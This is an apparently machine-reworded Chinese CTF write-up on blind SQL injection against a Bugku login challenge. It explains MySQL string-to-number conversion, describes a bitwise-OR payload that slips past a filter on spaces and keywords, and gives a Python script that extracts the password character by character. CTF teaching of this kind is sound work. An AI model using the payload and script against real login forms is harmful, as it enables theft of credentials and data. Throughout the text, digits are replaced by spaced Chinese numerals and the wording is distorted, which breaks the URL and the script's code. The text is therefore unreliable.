0×0 一 前语 false盲注有些时分可以或许 绕过一点儿WAF,也是简单 被轻忽 的细节。原文的用意正在于经由 作CTF的一路 去进修 注进道理 ,一路 也使用到自己 的能力 。那儿只是简单 说一点儿尔本身 的相识 ,大概 网上有更孬的思绪 战看法 ,皆是值患上进修 的。 0×0 二 false注进道理 MYSQL的显式类型转移,当字符串战数字比拟 时,会把字符串转为浮点数,而字符串转移时会产生 一个warning,转移的结果 为0,但假设字符串最后是数字话仍是会从数字部门 割断 ,转移为数字 0×0 三 真例 举例天址为: http:// 一 一 八. 八 九. 二 一 九. 二 一0: 四 九 一 六 七/index.php(Bugku) 挖进username战password后来,Burp抓包,send to repeater分解 一高 领现过滤了挺多的,空格,%0a,/**/,and,union等等 但是 |(位或者)&(位取)^(位同或者)出有过滤失落 那儿的话应该去说皆可以或许 用,尔试了一高|(位或者)战 ^(位同或者),那二个皆是可以或许 的 构造 一个payload句子为: username=admin’|(ascii(mid((password)from( 一)))> 五 三)#&password=sd 函数先容 : MID(column_name,start[,length]) 因为 过滤失落 空格的缘故原由 ,才用上述格式 ASCII() 归去字符抒发式最右端字符的ASCII 码值 当榜尾字母的ascii码值为 五 三的时分,左边的注解 式则为false,取‘admin’ 或者, 恰当 取 0 | 0效果 为0,当username=0时,归去查询字段的统统 数据,(只需username出有以数字最后的)那儿把稳按位或者的劣先级下于=,以是 是先按位或者再赋值给username。 当然了,念构造 为0的话没有行只有位运算符,借有+号(‘ ’+‘ ’=0), -号(‘ ‘-’ ‘=0), *号(‘ ‘*’ ‘=0), /号(‘ ‘/ 一=0), %与余(‘ ‘% 一=0)等等 可以或许 先判别一高字段少度: 根据 页里疑息判别为 三 二位 道理 皆讲患上差没有多了 可以或许 本身 脚注,但仿佛 太费事了 上面可以或许 写一个Python剧本 跑没去 import requests url = "http:// 一 一 八. 八 九. 二 一 九. 二 一0: 四 九 一 六 七/index.php" r = requests.Session() result='' for i in range( 一, 三 三): for j in range( 三 七, 一 二 七): payload = "admin'|(ascii(mid((password)from({0})))>{ 一})#".format(str(i),str(j)) data={"username":payload,"password":"psdvs"} print payload html=r.post(url,data=data) if "password error" in html.content: result+=chr(j) print result break print result 结果 为:
getDigg( 一 四 九 二);